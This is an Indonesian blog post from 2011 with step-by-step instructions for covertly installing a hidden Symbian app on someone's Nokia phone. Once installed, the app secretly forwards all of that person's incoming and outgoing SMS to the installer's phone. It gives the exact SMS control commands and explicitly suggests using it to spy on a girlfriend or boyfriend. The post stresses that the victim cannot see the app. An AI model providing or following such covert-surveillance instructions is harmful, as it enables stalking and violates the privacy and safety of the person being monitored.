WELCOME TO MY BLOG | Please follow my blog and give criticism if there is a shortage in my blog | Share Game , RF PvP , Artikel , EBook , etc | Terus ikuti perkembangan perkembangan dalam blog saya ini | FB : search : Dika Catur Susilo | YM : dicka.swtlah | Twitter : @dikacaturs | Thanks before your visited my blog :D

efek

twitter

Pasang Iklan disini

Pasang Iklan Disini

Selasa, 25 Januari 2011

Sadap Sms

ini adalah trik untuk menydap pnsel, bisa digunakan sebagai mata-mata untuk pacar biar tidak selingkuh.hehehehehehe .(klo gw mah g punya pacar xD)

oke langsung saja.

syarat:

# HP adalah HP symbian. Baik HP agan maupun HP "korban" agan.
# Merek NOKIA
# Memiliki aplikasi simbyan smsanywherelite.sis

hp korban juga harus sama ya punya aplikasi simbyan smsanywherelite.sis

Ikuti instruksi berikut ini untuk menyadap dan sadap sms hp :

1. link downloadnya disini

kalo kagak bisa disitu, download di sene :
disini

2. Masukkan aplikasi symbian itu di HP lu dan korban

3. Begitu aplikasi ini diinstal, elu kagak bisa ngeliad program maupun ikon aplikasi itu dalam ponsel. Seluruh pengontrolannya harus lewat sms, mulai dari pengaktifan dan mematikan program, mengubah password, ampe pengiriman sms ke ponsel lain. Tapi justru itu keuntungannya .Kalo pake buat alat sadap. Berarti sang target kan kagak tahu kalau diponselnya udah kepasang aplikasi tersebut. Justru itu, temen lu kaga bakal tau kan kalo smsnya disadap? Karena aplikasi symbian ini belum mendukung GUI (Graphics User Interface).

4. Siapkan hp/ponsel korban agan

5. Siapkan HP aganyang akan menerima sms masuk dari korban agan..

6. Aktifkan aplikasi ini di ponsel korban dengan mengetik format sms -[ SA(spasi)(password)(spasi)ON ]-. Panjang password maksimal 8 karakter. Misal, jika password lu 123456, ketikkan SA 123456 ON kirim sms ini ke nomor ponsel kedua/ponsel lu. buat matiinya, ketik SA 123456 OFF ke nomor yang sama.

7. Lalu, klo elu ingin menyadap lebih dari 5 hari..atau setiap sms masuk di hp korban akan selalu diteruskan ke hp lu, ketik sms ini di hp korban lu : SA(spasi)(password)(spasi)R1, misal SA 1234567 R1. Untuk mematikan fungsi ini ganti parameter di belakang "R" menjadi nol. Jadi, tuliskan SA 1234567 R0. Sedangkan untuk meneruskan setiap sms keluar, kirim sms bertuliskan SA 1234567 S1 ke nomer lu. Matiin fungsi ini dengan mengirim SMS SA 1234567 S0

8. Sekarang, setiap korban menerima dan mengirim sms..elu nakal dapet terusannya sama persis dengan sms aslinya 36

selamat mencoba . . .

CREDIT TO : ALL ADMIN MASTER HACKER

Tidak ada komentar:

Posting Komentar